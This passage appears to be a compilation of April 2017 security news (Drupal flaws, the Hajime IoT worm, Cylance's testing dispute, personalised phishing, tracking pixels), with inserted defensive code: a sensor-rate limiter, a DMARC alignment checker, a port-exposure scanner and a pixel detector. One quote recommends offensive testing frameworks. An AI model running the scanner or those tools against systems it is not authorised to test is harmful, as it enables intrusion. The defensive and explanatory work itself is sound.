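// quantization) to a raw ambient-light reading function.
// Assumptions: readRaw() returns illuminance in lux; now() returns milliseconds
// (injectable so the behaviour can be driven by a fake clock).
function createMitigatedSensor(readRaw, { maxHz = 10, quantumLux = 50, now = () => Date.now() } = {}) {
  const minIntervalMs = 1000 / maxHz;
  let lastAt = -Infinity;
  let lastValue = null;

  return function read() {
    const t = now();
    // Mitigation 1: cap the readout rate. Calls that arrive too soon get the
    // previous value back, so a page cannot sample faster than maxHz.
    if (t - lastAt < minIntervalMs) {
      return lastValue;
    }
    lastAt = t;
    // Mitigation 2: quantize. Small brightness differences caused by the page's
    // own content (dark vs. light background) land in the same bucket.
    lastValue = Math.round(readRaw() / quantumLux) * quantumLux;
    return lastValue;
  };
}

// Seconds needed to transfer `bits` at the rate the post assumes for a reliable
// exploit (one bit per 500 ms); reproduces the post's figures, e.g. 400 bits -> 200 s.
function detectionSeconds(bits, secondsPerBit = 0.5) {
  return bits * secondsPerBit;
}

// Constructed sample: raw readings a sensor might report while the page flips its
// background between dark and light under constant room lighting. The ~12 lux
// difference is the signal the attack keys on.
const SAMPLE_RAW_LUX = [112, 124, 112, 124];

// Polls the mitigated sensor at 60 Hz for 200 ms and reports what a page would see.
function demo() {
  let t = 0;
  let i = 0;
  const read = createMitigatedSensor(
    () => SAMPLE_RAW_LUX[i++ % SAMPLE_RAW_LUX.length],
    { maxHz: 10, quantumLux: 50, now: () => t }
  );
  const seen = [];
  for (let frame = 0; frame < 12; frame++) {
    t = Math.round(frame * 1000 / 60); // integer ms timestamps: 0, 17, 33, ..., 183
    seen.push(read());
  }
  // With a 50 lux quantum both 112 and 124 round to 100, and the 10 Hz cap lets only
  // two raw reads through in 200 ms: the page learns nothing about the flip.
  return { seen, distinctLevels: new Set(seen).size, rawSamplesConsumed: i };
}
```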


Introduction to the NIST CyberSecurity Framework for a Landscape of Cyber Menaces
20.4.2017 securityaffairs Cyber

The implementation of the NIST CyberSecurity Framework is of vital importance for the changes taking place in the landscape of zero-day threats
The NIST CyberSecurity Framework is a guide to good information security practices for businesses and enterprises. It proposes a guide which each enterprise can adapt to its own needs.

The framework gives enterprises and businesses the possibility of applying the principles and best practices of risk management to improve the security and resilience of critical infrastructure. It provides organization and structure for today’s multiple approaches, drawing on the best practices already adopted across the industry.

The Framework is a risk-based approach to managing cyber security risk and is composed of three parts: the Framework Core, the Framework Implementation Tiers, and the Framework Profiles. Each component of the Framework reinforces the connection between business owners and cyber security activities.

In its composition, the Framework Core has five concurrent and continuous functions: Identify, Protect, Detect, Respond and Recover.

NIST CyberSecurity Framework

When placed together, these functions give a high-level, strategic view of the life cycle of an organization’s cyber security risk management. The Framework Implementation Tiers give the context in which an organization understands its cyber security risk and the processes established to manage that risk.

The Framework Profile can be defined as an alignment of the standards, guides and practices of the Framework Core with a particular implementation scenario. The Framework Profile can be used to identify opportunities for improving the cyber security posture by comparing the current Profile (“how it is”) with the target Profile (“how it will be”).

By being adaptive, the NIST CyberSecurity Framework can detect and respond to new threats that appear out of thin air. This includes ransomware, IoT hacking and other new types of malware. Risk management is treated as an ongoing process to identify, assess and respond to risk. To manage risk, organizations must understand the probability of an event occurring and the impact resulting from it.

This information gives organizations the capability to determine the acceptable level of risk for delivering services, which is expressed as their risk tolerance. This understanding enables organizations to prioritize their cyber security activities. It is important to adapt so that organizations can respond. The NIST CyberSecurity Framework is available for small businesses, critical infrastructure services and other organizations.

As cloud, big data and analytics reach a new level, so does the potential for damage to health care, the power grid, IoT and businesses. The Framework is organized into Tiers to cover all aspects of information security, including assets and employee best practices. This approach gives organizations the ability to isolate threats, so that detection and mitigation do not affect other assets of the organization.

Source:

https://gcn.com/articles/2017/03/31/cybersecurity-framework-revisions.aspx

nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf

http://csrc.nist.gov/groups/SMA/fisma/sp800-53r5_pre-draft.html

http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841

http://www.nextgov.com/cybersecurity/2017/04/bill-improve-small-business-cybersecurity-advances/136750/

http://blog.executivebiz.com/2017/04/tech-firms-urge-nist-to-include-vulnerability-disclosure-processes-in-cybersecurity-framework/


https://www.nist.gov/news-events/news/2014/10/nist-releases-final-version-smart-grid-framework-update-30

https://www.nist.gov/itl/ssd/systems-interoperability-group/health-it-testing-infrastructure


Drupal Patches Critical Access Bypass Flaw

20.4.2017 securityweek  Vulnerebility
Updates released for versions 8.2 and 8.3 of the Drupal content management system (CMS) address a critical access bypass vulnerability.

The flaw, discovered by Drupal developer Samuel Mortenson and tracked as CVE-2017-6919, has been classified as critical by the Drupal security team, but it only affects websites if certain conditions are met.

Websites are vulnerable to attacks exploiting this flaw if they have the RESTful Web Services (RESTWS) module enabled and they allow PATCH requests. The attacker must also be able to register an account on the targeted site.

Nevertheless, the security hole is potentially serious, which is why Drupal developers have released a patch not only for the 8.3 branch, but also for the 8.2 series, which has reached end of life and will not receive other updates.

Drupal has advised 8.2.x users to update to Drupal 8.2.8, but still recommends updating to Drupal 8.3 at a later time. In the case of Drupal 8.3, the vulnerability has been patched with the release of version 8.3.1. Drupal 7 is not affected.

Vulnerabilities involving the RESTWS module have been known to be exploited in the wild. In September 2016, researchers spotted attempts to exploit a RESTWS flaw that had been patched two months earlier.

The latest updates come only one day after Drupal announced the availability of a patch for a critical flaw affecting a popular third-party module.

The References module, used by more than 121,000 websites, had not been updated since 2013 and Drupal flagged it as unsupported. However, Drupal has managed to find a new maintainer for the module and the security hole has been fixed.


Symantec is monitoring the Hajime IoT malware, is it the work of vigilante hacker?
20.4.2017 securityaffairs IoT

Symantec observed the Hajime IoT malware leaving a message on the devices it infects, is it the work of a cyber vigilante?
The Mirai botnet is the most popular thingbot; it has been targeting poorly configured and flawed ‘Internet of Things’ devices since August 2016, when the threat was first discovered by the researcher MalwareMustDie.
Many other bots threaten the IoT landscape, but recently an antagonist appeared in the wild, its name is Hajime.

Hajime has been spreading quickly in the last months, mostly in Brazil and Iran.

Hajime IoT malware

The Hajime malware was first spotted in October 2016, and it uses the same mechanism as Mirai to spread itself. The threat targets unsecured IoT devices with open Telnet ports and default passwords still in use. Researchers discovered that Hajime uses the same list of username and password combinations as Mirai, plus two more.

Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes. The threat has a modular structure allowing operators to add new capabilities on the fly.

The analysis of Hajime reveals that it doesn’t implement distributed denial of service (DDoS) capabilities or any other attacking code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:

Just a white hat, securing some systems. Important messages will be signed like this!

Hajime Author.

Contact CLOSED

Stay sharp!

The message is digitally signed and the worm will only accept messages signed by a hardcoded key. Once it has infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358, in order to prevent attacks from other IoT threats, including Mirai.

Experts believe Hajime could be the work of a cyber vigilante; in the past we have observed similar code, such as Linux.Wifatch, discovered by Symantec in October 2015.

“The problem with these white worms is that they usually turn out to have a short lifespan. That is because their effects are only temporary. On the typical IoT system affected by these worms the changes made to improve the security are only in RAM and not persistent.” observed Symantec.

In the broadcast message, the author refers to themselves as the “Hajime Author” but the name Hajime appears nowhere in the binaries. The name “Hajime” didn’t come from the author, but from the researchers who discovered the malware.

“This shows that the author was aware of the researchers’ report and seemed to have liked the name.” concluded the analysis.

Experts from Symantec also discovered bugs in the Hajime IoT malware and provided signatures for detecting them.


Cylance Battles Malware Testing Industry

20.4.2017 securityweek Analysis  
Cylance vs. Malware Testing Industry

After a brief respite, the animosity between the incumbent anti-virus vendors and the newcomer machine learning (ML) endpoint protection vendors has returned; and the focus is still on testing.

On Monday this week, Ars Technica published an article with one new element: a test using 48 Cylance-provided malware samples showed 100% detection by Cylance, but somewhat less from competing products. It turned out that nine of the samples were harmless. This "led the engineer [conducting the tests]," wrote Ars, "to believe Cylance was using the test to close the sale by providing files that other products wouldn't detect -- that is, bogus malware only [Cylance] would catch."

On Tuesday, Cylance's vice president of product testing and industry relations, Chad Skipper, blogged about the Ars article and the 'harmless' samples. He explained that Cylance doesn't simply use known malware for tests, but alters them via the mpress and vmprotect packers so they effectively become unknown malware. Sometimes, however, the packing doesn't fully work, and actually renders the original malware harmless. This, he suggests, is closer to the real-life situation faced by end users.

Not all the questions raised by the Ars article are fully explained by Skipper. "Of the nine files in question," writes Ars, "testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware." Skipper responded, "We don't give empty files on purpose -- it's just not what we do."

Nevertheless, if seven of the 48 samples were incorrectly detected as malware by Cylance, that's a pretty high false positive rate of just over 14.5% -- a rate that would not have been detected had not the engineer looked more closely at the testing results.

This has led to some suggestions that Cylance is gaming the system. "It's unbelievable that businesses today can't trust the people who they rely on to keep them secure," commented Mike Viscuso, CTO and co-founder of endpoint security firm Carbon Black. "The actions Cylance has taken puts their customers and our national security at risk."

"Not sure if it can be called cheating," said Luis Corrons, technical director at PandaLabs, a competitor in the endpoint security space; "anyway it is clear to me that ethics are not an obstacle for Cylance to get new customers. They do not allow testers to do comparative testing of their solution unless they impose their methodology, therefore there is a lack of independent testing to validate their marketing claims, so they ask their prospects to do their own tests, and they give them a preselected set of 'malware'." He added that if he were to do similar at Panda, "I would be fired."

Cylance claims that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning). Those vendors in turn suggest that some (not all) ML-based vendors seek to bias the testing in their own favor, and threaten law suits if they do not get their own way. The threat became reality earlier this year when CrowdStrike sued testing firm NSS Labs.

One of Skipper's arguments is that other vendors use the Anti Malware Testing Standards Organization's (AMTSO) Real Time Threat List (RTTL). This list is largely known by the vendors, and consequently does not provide a genuine test.

While this may be true for some vendors' own tests, it is not generally true for third-party testing. Lists such as RTTL and the WildList are mostly used for product certification, but not for comparative testing. Independent researcher David Harley explained, "They're of considerably less use for comparative testing, as the testing industry has always been aware. After all, the point of comparative testing is to differentiate between products. A test restricted to malware which is already known to vendors (or a substantial majority thereof) is not going to show enormous differences."

This was confirmed by an independent third-party tester who asked not to be named. He described four methods of acquiring malware samples: from a vendor; from VirusTotal; from a third-party source such as a large corporation; and lastly, by monitoring the threat landscape and acquiring threats and attack methods independently. He, and he believes the majority of test labs, use the last method.

"Tests that use malware gathered using the first three approaches could put Cylance at a disadvantage versus vendors that suck in lots of files and generate signatures," he told SecurityWeek. "But I'm not sure that it's fair to say that all vendors do that. It seems a bit old-fashioned and error-prone. I also don't think it makes the tests unfair. It simply highlights the inconvenient fact that there are loads of threats and Cylance's approach is not perfect because it doesn't provide full coverage. Sure, it is at a disadvantage -- but one of its own making, not because the testing is wrong."

Harley agrees with this basic viewpoint. "If comparative testing was about the exclusive use of cooperatively verified lists, it would still be more accurate than using samples supplied by a single vendor and containing a high percentage of garbage files."

John Shaw, VP product management at Sophos, also a player in the next-gen endpoint security market, pointed out that the Cylance arguments against the third-party testing industry could more accurately be aimed at Cylance itself. "The leading testing organizations," he told SecurityWeek, "are working to improve their ability to test products in more representative 'real world' environment, using massively used techniques like infecting legitimate websites, and exploits against legitimate software. To do this at scale is hard and the industry still has a long way to go. Clearly for an individual customer to try and run a statistically significant test that simulates the real world is close to impossible, even with unlimited time." (Sophos previously published a stinging rebuke against Cylance's product comparison methods last summer.)

This doesn't mean it's impossible to self-test -- just very, very hard. "With testing," said Viscuso, "it's important to go beyond malware samples and test how the product handles real-world attacks. Malware samples alone are going to demonstrate one thing -- how well the product can stop the particular malware samples in your sample set. You're interested in stopping attacks, not just malware. Real world attackers don't rely on packed executables. They use documents, PowerShell, Python, Java, built-in OS tools, anything they can leverage to get the job done. To test the solution against real-world attack techniques, use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples."

It should be said that several vendors, including ML-based vendors and test laboratories, declined to comment: the issue is bitter and divisive. From those that did respond to SecurityWeek, the consensus is clear. Almost all agree that comparative third-party testing is difficult, but not impossible. And almost all, but one, agree that in rejecting independent testing, Cylance has replaced it with something far worse and potentially misleading. The exception is NSS Labs. "I don’t think Cylance did anything wrong," said Vikram Phatak, CEO of NSS Labs. "Their execution appears to have been problematic, but not their approach."


Personalized Spam and Phishing
20.4.2017 Kaspersky Spam

Most spam, especially the sort that is mass-mailed on behalf of businesses, has quite an impersonal format: spammers create a message template for a specific mailing purpose and often drastically diversify the contents of that template. Generally, these kinds of messages do not personally address the recipient and are limited to common phrases such as “Dear Client”. At most, the name of the mailbox (or part of it) is substituted from the email address the spammer holds. Any specifics that may help the recipient ascertain whether the message is addressed personally to him, for example an existing account number, a contract number, or the date of its conclusion, are missing from the message. This impersonality, as a rule, attests to a phishing attempt.

Lately, however, we have been noticing an opposite tendency occurring quite often, wherein fraud becomes personalized and spammers invent new methods to persuade the recipient that the message is addressed personally to him. Thus, in the malicious mailing that we discovered last month, spammers used the actual postal addresses of the recipients in messages to make them seem as credible as possible. This information is sold to evildoers as ready-to-use databases with physical addresses (they are frequently offered for sale in spam messages), collected by evildoers from open sources, or obtained by evildoers when hacking email accounts, for example. Of course, cybercriminals will not have very many of these addresses at their disposal (compared to generated addresses), but they are much more valuable.

Personalized Spam and Phishing

The way spammers organize their personalized attacks plays an important role as well. In general, messages are mass mailed on behalf of an existing company, while the technical headers of fake messages use the company’s actual details.

There are several ways to use genuine details. The crudest is spoofing, that is, substituting the technical headers of the message, which any mass-mailing program can do. In a spoofed message the “From” field contains a real address belonging to the impersonated company. Spam is then mass-mailed on behalf of that company, which can seriously damage its reputation. Yet not every header can be forged: the sending server’s IP address, and the SPF and DKIM results the receiving server records for it, stay genuine, so a good anti-spam filter will not let these messages through.


Another method is to send spam from so-called hijacked infrastructure. This is much harder technically, since the mail server of the target company has to be compromised first. Once an attacker controls it, he can send messages with legitimate technical headers from any email address owned by the company and on behalf of any employee who works there. To anti-spam filters such a fake message looks entirely credible and travels freely from server to server, because the digital signatures (such as DKIM) and other authentication data in the headers are genuine. Both sides lose: the recipient who takes the bait (network infection and theft of personal data or business information), and the company whose infrastructure is abused.

Cybercriminals usually pick small businesses (up to a few dozen employees) as hacking victims. Owners of so-called parked domains are of particular interest: these are domains a company has registered but does not use for a website.
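The difference between the two techniques shows up in the authentication results a receiving mail server attaches to a message. The following added example (not Kaspersky’s code, and not taken from the mailing it describes) applies a DMARC-style alignment check to two constructed messages: a spoofed one, where the “From” domain does not match the envelope sender that passed SPF, and a message from hijacked infrastructure, where every result is genuine and the check passes. The domain names, IP addresses and header values are invented for the example.

```python
import email
import re
from email.utils import parseaddr

# Constructed messages (not real samples). The first spoofs a recruiter's From
# header while the envelope sender and SPF result point at a bulk-mailing host;
# the second is what mail sent from the company's own hijacked server looks
# like: every authentication result is genuine.
SPOOFED_MESSAGE = """\
Return-Path: <bounce@bulk-mailer.invalid>
Authentication-Results: mx.recipient.invalid;
 spf=pass (sender IP is 203.0.113.10) smtp.mailfrom=bounce@bulk-mailer.invalid;
 dkim=none
From: ACME Recruiting <hr@acme-recruiting.invalid>
To: victim@recipient.invalid
Subject: Your parcel delivery notification

Your order is on its way, see the tracking link below.
"""

HIJACKED_MESSAGE = """\
Return-Path: <hr@acme-recruiting.invalid>
Authentication-Results: mx.recipient.invalid;
 spf=pass (sender IP is 198.51.100.7) smtp.mailfrom=hr@acme-recruiting.invalid;
 dkim=pass header.d=acme-recruiting.invalid header.s=mail
From: ACME Recruiting <hr@acme-recruiting.invalid>
To: victim@recipient.invalid
Subject: Your parcel delivery notification

Your order is on its way, see the tracking link below.
"""


def _domain_of(addr):
    """Domain part of 'Name <user@host>' or 'user@host', lower-cased."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def _aligned(from_domain, auth_domain):
    """Relaxed DMARC alignment: identical domain, or one is a subdomain of the other."""
    if not from_domain or not auth_domain:
        return False
    return (auth_domain == from_domain
            or auth_domain.endswith("." + from_domain)
            or from_domain.endswith("." + auth_domain))


def check_alignment(raw_message):
    """Compare the header From domain with the SPF/DKIM results recorded by the
    receiving MTA. A spoofed From fails alignment; mail from hijacked
    infrastructure passes, which is why this check alone is not enough."""
    msg = email.message_from_string(raw_message)
    from_domain = _domain_of(msg.get("From", ""))
    results = " ".join(msg.get_all("Authentication-Results", []))

    # Pull the result keyword and the domain it applies to out of the header.
    spf = re.search(r"\bspf=(\w+)(?:[^;]*\bsmtp\.mailfrom=([^\s;]+))?", results)
    dkim = re.search(r"\bdkim=(\w+)(?:[^;]*\bheader\.d=([^\s;]+))?", results)

    mailfrom_domain = spf.group(2).rpartition("@")[2].lower() if spf and spf.group(2) else ""
    dkim_domain = dkim.group(2).lower() if dkim and dkim.group(2) else ""

    spf_aligned = bool(spf and spf.group(1) == "pass" and _aligned(from_domain, mailfrom_domain))
    dkim_aligned = bool(dkim and dkim.group(1) == "pass" and _aligned(from_domain, dkim_domain))
    return {
        "from_domain": from_domain,
        "mailfrom_domain": mailfrom_domain,
        "dkim_domain": dkim_domain,
        "spf_aligned": spf_aligned,
        "dkim_aligned": dkim_aligned,
        "verdict": "pass" if (spf_aligned or dkim_aligned) else "fail",
    }


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED_MESSAGE), ("hijacked", HIJACKED_MESSAGE)):
        print(name, check_alignment(raw))
```

The second message passes because the attacker is sending from the company’s real server with its real DKIM key; alignment checks only tell you that the message came from the domain it claims, not that the domain is still under the owner’s control.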

In the samples we detected, personalized malicious spam was mass-mailed on behalf of an existing small company specializing in staff recruitment. The messages contained order delivery notifications typical of malicious spam, but also gave the recipients’ real postal addresses. They also contained URLs hosted on legitimate domains that changed constantly throughout the mailing. Following the URL downloads malware to the user’s computer.

In short, spam is becoming more personalized and mailings more targeted. This is exactly what the criminals count on as users’ digital literacy rises: it is not easy to remember every subscription, every online order, or every place you have left personal data such as your address. That information load calls for smart security solutions and for measures to protect your “information-driven personality”.


To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does
19.4.2017 thehackernews Hacking
It should be noted that gaining unauthorised access to a system you do not own is illegal, whatever the actual intention behind it.
This is worth pointing out because someone the media has labeled a 'vigilante hacker' is reportedly breaking into vulnerable 'Internet of Things' devices, supposedly in order to secure them.
This is not the first time a hacker has played vigilante: there have been previous incidents in which malware compromised thousands of devices and, instead of abusing them, forced their owners to secure them.
Dubbed Hajime, the latest IoT botnet malware used by this hacker has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices.
Reportedly, the aim is to wrest control of them away from Mirai and other malicious threats.
Mirai is the IoT botnet that threatened the Internet last year, most notably with the record-setting distributed denial-of-service attacks against DNS provider Dyn last October. It scans for IoT devices that are still using default passwords.
How the Hajime IoT Botnet Works
Hajime works much like Mirai: it spreads via unsecured IoT devices that have open Telnet ports and use default passwords, and it tries the same list of username and password combinations that Mirai is programmed to use, with the addition of two more.
What is interesting about Hajime is that, unlike Mirai, it then locks the device down by blocking access to four ports (23, 7547, 5555 and 5358) known to be used to attack many IoT devices, keeping Mirai and other threats out.
Also unlike Mirai, Hajime uses a decentralized peer-to-peer network instead of a command-and-control server to issue commands and updates to infected devices, which makes it harder for ISPs and Internet backbone providers to take the botnet down.
Hajime also takes steps to hide its running processes and files on the file system, making infected systems harder to detect.
Besides this, Hajime lacks DDoS capabilities or any other attack code: apart from the lockdown, it contains only the propagation code that lets an infected device search for other vulnerable devices and infect them.
One of the most interesting things about Hajime is that roughly every 10 minutes the botnet displays a cryptographically signed message on the terminal. It reads:
Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED Stay sharp!
There's Nothing to Get Excited About
No doubt there is a temptation to applaud Hajime, but its protection lasts only until users reboot their hacked devices.
Hajime has no persistence mechanism: it is loaded into the device's RAM only, so once the IoT device is rebooted it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world.
"One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware," the Symantec researchers explained.
There's another problem...
Hacking someone in order to prevent hacking is not a legitimate practice, which is also why we are concerned about a related change to US law, the amended Rule 41, which grants the FBI much greater powers to legally break into computers in any country, take data, and engage in remote surveillance.
So the most concerning question of all is: what guarantee is there that Hajime's author will not add attack capabilities to the worm and use the hijacked devices for malicious purposes?
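Because Hajime's lockdown disappears on reboot, the only reliable way to know whether a device is still protected is to check it yourself. The following added example (not Symantec's or The Hacker News' code) is a small TCP reachability audit for the four ports the article names; it reports which of them still accept connections on a host you are responsible for. The local-listener helpers exist only so the scanner can be exercised offline against 127.0.0.1; the port list itself is the one given above, and the timeout value is an assumption.

```python
import socket
from contextlib import closing

# Ports the article says Hajime blocks on an infected device: Telnet, the
# TR-069 remote-management port (7547) and two others abused by IoT worms.
HAJIME_BLOCKED_PORTS = (23, 7547, 5555, 5358)


def scan_ports(host, ports=HAJIME_BLOCKED_PORTS, timeout=1.0):
    """Return {port: True} for every port that accepted a TCP connection, else False.
    A full connect (not a SYN probe) so it needs no privileges. Only run this
    against devices you are responsible for."""
    state = {}
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)
            state[port] = s.connect_ex((host, port)) == 0
    return state


def exposure_report(host, ports=HAJIME_BLOCKED_PORTS, timeout=1.0):
    """Summarise which watched ports are reachable; 'exposed' is True if any is.
    After a reboot of a Hajime-infected device you would expect 23 to reopen."""
    state = scan_ports(host, ports, timeout)
    open_ports = sorted(p for p, is_open in state.items() if is_open)
    return {"host": host, "open": open_ports, "exposed": bool(open_ports)}


# Offline test helpers: a throwaway listener on the loopback interface, and an
# ephemeral port that was just bound and released, so it now refuses connections.
def start_local_listener():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def closed_local_port():
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_local_listener()
    try:
        print(exposure_report("127.0.0.1", ports=(open_port, closed_local_port())))
    finally:
        srv.close()
```

Run it against a device before and after a reboot: if port 23 flips from closed to open, the device was "protected" only by a resident worm, and the real fix is a firmware update and a changed password.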


Tracking Pixels Used in Phishing Campaigns

19.4.2017 securityweek Phishing  

Very small image files that can track user behavior have started to appear in phishing campaigns, where attackers use them to gather information on their targets, Check Point researchers warn.

These images are designed to make the viewer’s client fetch them from an outside web server, and that request is what reports back. Usually only one pixel in size, they can also be hidden by giving them the same color as the background of the page, so the user never notices them. They can be used in emails in the same way, and are called tracking pixels because of their small size and obvious purpose.

The request that fetches the image tells the server the moment it was downloaded, and the server can be set up to “capture information such as IP addresses, hostnames, operating systems, Web-browser types, dates the image was viewed, use of cookies, and other information,” Check Point explains.
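The characteristics just described (a remote image, one pixel or smaller, often hidden by inline CSS, and frequently carrying a per-recipient token in its URL) are enough to spot most beacons in an HTML email before any image is loaded. The following added example (not Check Point's code, and the HTML body is constructed for the example rather than taken from an observed campaign) scans an email body with the standard library's HTML parser and returns every remote image that looks like a tracking pixel, together with the reasons it was flagged.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed HTML body (not a Check Point sample): a visible logo, two
# tracking pixels in the styles described above, and an inline (cid:) image
# that cannot beacon anywhere and so must not be flagged.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Your invoice is attached.</p>
<img src="https://cdn.mailer.invalid/logo.png" width="200" height="60" alt="logo">
<img src="https://track.mailer.invalid/open.gif?u=7f3a9c" width="1" height="1" alt="">
<img src="https://track.mailer.invalid/b.png" style="display:none; width:1px; height:1px">
<img src="cid:embedded-logo" width="1" height="1">
</body></html>
"""

_STYLE_SIZE = re.compile(r"(width|height)\s*:\s*(\d+)\s*(?:px)?", re.I)


def _px(value):
    """'1', '1px', ' 0 ' -> int; anything unparsable -> None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class _PixelFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        url = urlparse(src)
        if url.scheme not in ("http", "https"):
            return  # inline (cid:) or relative images cannot report back to a server
        width, height = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").lower()
        for name, value in _STYLE_SIZE.findall(style):  # inline CSS overrides the attributes
            if name.lower() == "width":
                width = int(value)
            else:
                height = int(value)
        reasons = []
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("tiny image (%dx%d)" % (width, height))
        compact = style.replace(" ", "")
        if "display:none" in compact or "visibility:hidden" in compact:
            reasons.append("hidden by inline style")
        if reasons and url.query:
            reasons.append("per-recipient token in URL query")
        if reasons:
            self.hits.append((src, reasons))


def find_tracking_pixels(html):
    """Return [(src, [reason, ...])] for every remote <img> that looks like a beacon."""
    finder = _PixelFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    for src, reasons in find_tracking_pixels(SAMPLE_EMAIL_HTML):
        print(src, "->", "; ".join(reasons))
```

The same logic can be run at a mail gateway to strip or neutralise the flagged images before delivery; the query-string check is deliberately only a secondary signal, since ordinary images with cache-busting parameters would otherwise be flagged too.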

This information is most often used by marketers to fine tune their advertising, but cybercriminals can also abuse the technique to gather information on cloud-platform components and discover known software vulnerabilities they can exploit in a later attack.

Check Point also explains that phishers can use tracking pixels in their attacks to learn which recipients are most likely to open their scam emails. Phishing attacks that leverage tracking pixels as a surveillance tool have been already observed in the wild, Check Point says.

“Since some scammers retool mass phishing attacks against random users to target high-value enterprise users, scammers are turning to pixel tracking to increase the odds a spear phishing attack will succeed,” the researchers reveal.

The researchers first observed tracking pixels in phishing emails in August 2016, when filters in place prevented the image from loading and a red “x” placeholder was displayed instead. These small images, Check Point says, threaten privacy in more than just emails and web pages.

“For well over a decade, it has been understood that you can utilize tracking pixels in Microsoft Office files like Word documents, Excel spreadsheets and PowerPoint presentations. This works because Office files can link to an image located on a remote Web server. Putting a tracking pixel in an Office document allows you to be able to track a document’s activity as it moves through an organization,” the security firm notes.

While not found to be the direct cause of any specific security breach, tracking pixels are used for their surveillance capabilities in activities that precede attacks against users and infrastructure. The good news, however, is that it’s easy to stay protected.

Enterprises are advised to deploy email and anti-phishing security controls as part of their cloud-security arsenal, and to keep any software running in a cloud environment patched at all times. Web application security controls can protect software that cannot yet be patched. Users should also watch for anomalous image placeholders when downloading pictures in marketing emails; a mail client that does not load remote images automatically denies the pixel its request in the first place.


Critical vulnerability in Drupal References Module opens 120,000 Sites to hack
19.4.2017 securityaffairs Vulnerebility

A critical vulnerability affects the Drupal References module that is used by hundreds of thousands of websites using the popular CMS.
The Drupal security team has discovered a critical vulnerability in a third-party module named References.

The Drupal team published a Security advisory on April 12 informing its users of the critical flaw.

The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.

“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:

Please note, the security team will not release information on this vulnerability for up to a month, the recommendation is to migrate. Emails asking for details on the vulnerability will not be responded to. If you would like to maintain the module, please follow the directions below.” states Drupal.

The References module allows users to add references between nodes for more complex information architectures.

The module had been flagged by the Drupal team as unsupported; its last update dated from February 2013.

The good news for References users is that on April 14 the Drupal security team announced that a prospective new maintainer had been found.

“2017-04-14 – A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated.” reads the advisory.

A few days later, on April 18, the problem was fixed with the release of References 7.x-2.2.


The Drupal security team has not disclosed technical details about the vulnerability, to avoid exploitation in the wild. Unfortunately, upgrading websites that rely heavily on the References module may be very difficult.

“With a critical issue in an unsupported module so widely used, it is almost guaranteed that a large number of sites will be subject to attacks using this as a vector.” states Drupal. “Given the tradition of Drupal doing big backward breaks with regards to compatibility, some sites might be difficult to upgrade. Upgrading an enterprise site heavily using References may simply be impossible and hopefully drive the module to be maintained by a corporate entity.”

Drupal will release information on the critical vulnerability in the next few weeks.

Security experts believe threat actors could find the vulnerability by analyzing the module’s source code, for instance by comparing the patched release with the previous one, and then develop an exploit.

Drupal sites are a favored target for attackers who try to exploit vulnerabilities in outdated modules.

In June 2016, security experts warned of Drupalgeddon attacks against Drupal websites more than 19 months after the public disclosure of CVE-2014-3704.


Oracle Patches Record Number of Vulnerabilities

19.4.2017 securityweek  Vulnerebility
Oracle’s Critical Patch Update (CPU) for April 2017 contains 299 fixes, the highest number of any CPU to date.

More than half of the vulnerabilities could be exploited remotely without authentication. Forty of the issues were rated Critical, and 25 had a CVSS score of 10.

Oracle Financial Services Applications was the most affected product, receiving fixes for 47 vulnerabilities this month, 19 of them rated critical with a CVSS score of 10. Additionally, 25 of the 47 vulnerabilities may be remotely exploitable without authentication, Oracle’s advisory reveals.

